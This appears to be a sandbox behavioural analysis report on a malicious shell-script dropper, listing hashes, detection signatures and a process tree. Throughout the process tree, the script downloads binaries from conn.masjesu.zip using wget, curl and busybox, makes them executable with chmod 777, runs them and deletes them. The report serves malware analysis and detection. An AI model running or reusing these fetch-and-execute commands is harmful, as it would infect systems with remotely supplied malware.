Analysis
- max time kernel: 105s
- max time network: 106s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 21/10/2024, 01:24
Static task: static1
Behavioral tasks:
- behavioral1: sample 70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample 70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh, resource debian9-armhf-20240729-en
- behavioral3: sample 70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample 70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh, resource debian9-mipsel-20240611-en
General
- Target: 70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
- Size: 10KB
- MD5: 39af5a8e20eb9037c16b16bbdb233387
- SHA1: fa93ebed804f88f9810f418aa96d520d93249855
- SHA256: 70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58
- SHA512: 82d0395702b8b6084c5c890074c5fe8cce1bb3fd3a61b94b1fb466c306072308348c69dd1745e1a944949d06cf55cf2f18862833d212ece5910d32d914d7eb4b
- SSDEEP: 192:QQqIcwDH+mKFlIZx/QVgh3Xql5cjG5Q3Xql54C0cwDH+mEFlIZx/F:QQq5VgNjG5CCY
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process chmod, pids: 741, 793, 806, 836, 847, 854, 861, 868, 875, 882, 889, 896, 903, 910, 917, 924, 931, 938, 945, 952, 959, 966, 973, 980, 987, 994, 1001, 1008
Executes dropped EXE (28 IoCs)
| ioc | pid | Process |
|---|---|---|
| /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc | 742 | ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc |
| /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO | 794 | yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO |
| /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 | 807 | AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 |
| /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I | 837 | ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I |
| /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u | 848 | LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u |
| /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw | 855 | 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw |
| /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm | 862 | Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm |
| /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR | 869 | q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR |
| /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA | 876 | 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA |
| /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N | 883 | 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N |
| /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh | 890 | 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh |
| /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY | 897 | 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY |
| /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD | 904 | OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD |
| /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 | 911 | nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 |
| /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm | 918 | Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm |
| /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR | 925 | q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR |
| /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA | 932 | 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA |
| /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N | 939 | 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N |
| /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh | 946 | 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh |
| /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY | 953 | 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY |
| /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD | 960 | OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD |
| /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 | 967 | nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 |
| /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc | 974 | ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc |
| /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO | 981 | yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO |
| /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 | 988 | AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 |
| /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I | 995 | ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I |
| /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u | 1002 | LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u |
| /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw | 1009 | 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw |
Reads runtime system information (28 IoCs)
| description | ioc | Process |
|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | curl (28 identical entries, one per curl invocation) |
System Network Configuration Discovery (1 TTPs, 64 IoCs)
Adversaries may gather information about the network configuration of a system.
- Process wget, pids: 717, 796, 812, 841, 850, 857, 864, 878, 885, 892, 899, 906, 913, 920, 927, 941, 948, 955, 962, 969, 976, 990, 997, 1004
- Process curl, pids: 788, 797, 819, 851, 858, 879, 900, 907, 914, 921, 928, 935, 949, 963, 970, 977, 991, 998, 1005
- Process busybox, pids: 739, 799, 831, 846, 867, 874, 881, 888, 902, 916, 923, 930, 937, 944, 951, 965, 972, 993
- Process nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3, pids: 911, 967
- Process rm, pid: 968
Writes file to tmp directory (28 IoCs)
Malware often drops required files in the /tmp directory.
Each of the 14 paths below was opened for modification by curl twice (28 IoCs in total).
| description | ioc | Process |
|---|---|---|
| File opened for modification | /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc | curl |
| File opened for modification | /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO | curl |
| File opened for modification | /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 | curl |
| File opened for modification | /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I | curl |
| File opened for modification | /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u | curl |
| File opened for modification | /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw | curl |
| File opened for modification | /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm | curl |
| File opened for modification | /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR | curl |
| File opened for modification | /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA | curl |
| File opened for modification | /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N | curl |
| File opened for modification | /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh | curl |
| File opened for modification | /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY | curl |
| File opened for modification | /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD | curl |
| File opened for modification | /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 | curl |
Processes
Process tree (PID, executable, command line, signatures hit in square brackets):
- PID 708 /tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh: /tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
  - PID 711 /bin/rm: rm bins.sh
  - PID 717 /usr/bin/wget: wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [System Network Configuration Discovery]
  - PID 728 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [Reads runtime system information; Writes file to tmp directory]
  - PID 739 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [System Network Configuration Discovery]
  - PID 741 /bin/chmod: chmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [File and Directory Permissions Modification]
  - PID 742 /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc: ./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [Executes dropped EXE]
  - PID 743 /bin/rm: rm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc
  - PID 744 /usr/bin/wget: wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO
  - PID 788 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 792 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO
  - PID 793 /bin/chmod: chmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO [File and Directory Permissions Modification]
  - PID 794 /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO: ./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO [Executes dropped EXE]
  - PID 795 /bin/rm: rm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO
  - PID 796 /usr/bin/wget: wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [System Network Configuration Discovery]
  - PID 797 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 799 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [System Network Configuration Discovery]
  - PID 806 /bin/chmod: chmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [File and Directory Permissions Modification]
  - PID 807 /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05: ./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [Executes dropped EXE]
  - PID 811 /bin/rm: rm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05
  - PID 812 /usr/bin/wget: wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [System Network Configuration Discovery]
  - PID 819 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 831 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [System Network Configuration Discovery]
  - PID 836 /bin/chmod: chmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [File and Directory Permissions Modification]
  - PID 837 /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I: ./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [Executes dropped EXE]
  - PID 839 /bin/rm: rm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I
  - PID 841 /usr/bin/wget: wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [System Network Configuration Discovery]
  - PID 844 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [Reads runtime system information; Writes file to tmp directory]
  - PID 846 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [System Network Configuration Discovery]
  - PID 847 /bin/chmod: chmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [File and Directory Permissions Modification]
  - PID 848 /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u: ./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [Executes dropped EXE]
  - PID 849 /bin/rm: rm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u
  - PID 850 /usr/bin/wget: wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [System Network Configuration Discovery]
  - PID 851 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 853 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw
  - PID 854 /bin/chmod: chmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [File and Directory Permissions Modification]
  - PID 855 /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw: ./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [Executes dropped EXE]
  - PID 856 /bin/rm: rm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw
  - PID 857 /usr/bin/wget: wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [System Network Configuration Discovery]
  - PID 858 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 860 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm
  - PID 861 /bin/chmod: chmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [File and Directory Permissions Modification]
  - PID 862 /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm: ./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [Executes dropped EXE]
  - PID 863 /bin/rm: rm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm
  - PID 864 /usr/bin/wget: wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [System Network Configuration Discovery]
  - PID 865 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [Reads runtime system information; Writes file to tmp directory]
  - PID 867 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [System Network Configuration Discovery]
  - PID 868 /bin/chmod: chmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [File and Directory Permissions Modification]
  - PID 869 /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR: ./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [Executes dropped EXE]
  - PID 870 /bin/rm: rm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR
  - PID 871 /usr/bin/wget: wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA
  - PID 872 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [Reads runtime system information; Writes file to tmp directory]
  - PID 874 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [System Network Configuration Discovery]
  - PID 875 /bin/chmod: chmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [File and Directory Permissions Modification]
  - PID 876 /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA: ./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [Executes dropped EXE]
  - PID 877 /bin/rm: rm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA
  - PID 878 /usr/bin/wget: wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [System Network Configuration Discovery]
  - PID 879 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 881 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [System Network Configuration Discovery]
  - PID 882 /bin/chmod: chmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [File and Directory Permissions Modification]
  - PID 883 /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N: ./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [Executes dropped EXE]
  - PID 884 /bin/rm: rm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N
  - PID 885 /usr/bin/wget: wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [System Network Configuration Discovery]
  - PID 886 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [Reads runtime system information; Writes file to tmp directory]
  - PID 888 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [System Network Configuration Discovery]
  - PID 889 /bin/chmod: chmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [File and Directory Permissions Modification]
  - PID 890 /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh: ./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [Executes dropped EXE]
  - PID 891 /bin/rm: rm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh
  - PID 892 /usr/bin/wget: wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [System Network Configuration Discovery]
  - PID 893 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [Reads runtime system information; Writes file to tmp directory]
  - PID 895 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY
  - PID 896 /bin/chmod: chmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [File and Directory Permissions Modification]
  - PID 897 /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY: ./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [Executes dropped EXE]
  - PID 898 /bin/rm: rm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY
  - PID 899 /usr/bin/wget: wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [System Network Configuration Discovery]
  - PID 900 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 902 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [System Network Configuration Discovery]
  - PID 903 /bin/chmod: chmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [File and Directory Permissions Modification]
  - PID 904 /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD: ./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [Executes dropped EXE]
  - PID 905 /bin/rm: rm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD
  - PID 906 /usr/bin/wget: wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [System Network Configuration Discovery]
  - PID 907 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 909 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3
  - PID 910 /bin/chmod: chmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [File and Directory Permissions Modification]
  - PID 911 /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3: ./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [Executes dropped EXE; System Network Configuration Discovery]
  - PID 912 /bin/rm: rm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3
  - PID 913 /usr/bin/wget: wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [System Network Configuration Discovery]
  - PID 914 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 916 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [System Network Configuration Discovery]
  - PID 917 /bin/chmod: chmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [File and Directory Permissions Modification]
  - PID 918 /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm: ./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm [Executes dropped EXE]
  - PID 919 /bin/rm: rm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm
  - PID 920 /usr/bin/wget: wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [System Network Configuration Discovery]
  - PID 921 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 923 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [System Network Configuration Discovery]
  - PID 924 /bin/chmod: chmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [File and Directory Permissions Modification]
  - PID 925 /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR: ./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR [Executes dropped EXE]
  - PID 926 /bin/rm: rm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR
  - PID 927 /usr/bin/wget: wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [System Network Configuration Discovery]
  - PID 928 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 930 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [System Network Configuration Discovery]
  - PID 931 /bin/chmod: chmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [File and Directory Permissions Modification]
  - PID 932 /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA: ./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA [Executes dropped EXE]
  - PID 933 /bin/rm: rm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA
  - PID 934 /usr/bin/wget: wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N
  - PID 935 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 937 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [System Network Configuration Discovery]
  - PID 938 /bin/chmod: chmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [File and Directory Permissions Modification]
  - PID 939 /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N: ./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N [Executes dropped EXE]
  - PID 940 /bin/rm: rm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N
  - PID 941 /usr/bin/wget: wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [System Network Configuration Discovery]
  - PID 942 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [Reads runtime system information; Writes file to tmp directory]
  - PID 944 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [System Network Configuration Discovery]
  - PID 945 /bin/chmod: chmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [File and Directory Permissions Modification]
  - PID 946 /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh: ./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh [Executes dropped EXE]
  - PID 947 /bin/rm: rm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh
  - PID 948 /usr/bin/wget: wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [System Network Configuration Discovery]
  - PID 949 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 951 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [System Network Configuration Discovery]
  - PID 952 /bin/chmod: chmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [File and Directory Permissions Modification]
  - PID 953 /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY: ./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY [Executes dropped EXE]
  - PID 954 /bin/rm: rm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY
  - PID 955 /usr/bin/wget: wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [System Network Configuration Discovery]
  - PID 956 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [Reads runtime system information; Writes file to tmp directory]
  - PID 958 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD
  - PID 959 /bin/chmod: chmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [File and Directory Permissions Modification]
  - PID 960 /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD: ./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD [Executes dropped EXE]
  - PID 961 /bin/rm: rm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD
  - PID 962 /usr/bin/wget: wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [System Network Configuration Discovery]
  - PID 963 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 965 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [System Network Configuration Discovery]
  - PID 966 /bin/chmod: chmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [File and Directory Permissions Modification]
  - PID 967 /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3: ./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [Executes dropped EXE; System Network Configuration Discovery]
